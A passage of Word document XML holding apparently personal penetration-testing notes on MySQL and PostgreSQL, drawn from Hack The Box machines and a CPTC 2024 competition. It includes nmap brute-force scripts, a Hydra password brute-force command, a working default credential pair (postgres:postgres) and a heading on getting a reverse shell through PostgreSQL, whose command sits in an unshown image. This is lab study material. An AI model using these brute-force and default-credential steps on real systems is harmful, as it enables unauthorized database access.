    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A7E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A7F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Banner Grabbing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1315"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet [IP] 3306 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1315"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql runs on</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3306</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1315"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Banner grabbing means to get information about a service running on a system, such as its software version, configuration details, or operating system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1315"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It might tell us what version of mysql is running, like MariaDB version 10.3.27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A84">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A85">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A86">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap MySQL Scripts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -sV -p3306 --script=mysql* &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Runs all the mysql scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A89">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A8A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Useful scripts include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql-brute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Performs brute-force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql-empty-password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Checks for accounts with no passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql-users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lists MySQL usernames.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql-databases</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Attempts to list databases if credentials are found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A90">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A91">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are inside a reverseshell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -h db -u [username] -p </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the MonitorsTwo HTB, if you put in the IP address for the "-h" argument, it doesn't work. You had to put the "db" argument. It might be a address resolution thing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also, I was inside a Docker Container, so that might be a reason</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A96">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>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1A98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">quit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A99">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A9A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A9B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce with Hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1375"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L usernames.txt -P passwords.txt -f -v &lt;IP&gt; mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A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9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A9F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8r5f4s0nzrt" w:id="217"/>
      <w:bookmarkEnd w:id="217"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usually port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5432</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try Postgresql Default Credentials. This was used in </w:t>
      </w:r>
      <w:hyperlink r:id="rId539">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nibbles</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AA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId540">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/netbiosX/Default-Credentials/blob/master/PostgreSQL-Default-Password-List.md</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Nibbles,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> postgres:postgres</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connecting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="925"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psql -h &lt;host&gt; -p &lt;port&gt; -U &lt;username&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="925"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also specify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d &lt;database&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but it will default to the username if you don't specify </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kxjy8echb6jl" w:id="218"/>
      <w:bookmarkEnd w:id="218"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command execution from PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AAB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AAC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CPTC 2024 Finals,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where we found PostgreSQL running and then we logged in and ran command to make it execute reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AAE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4329113" cy="4433178"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="373" name="image366.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image366.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId541"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4329113" cy="443317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AAF">
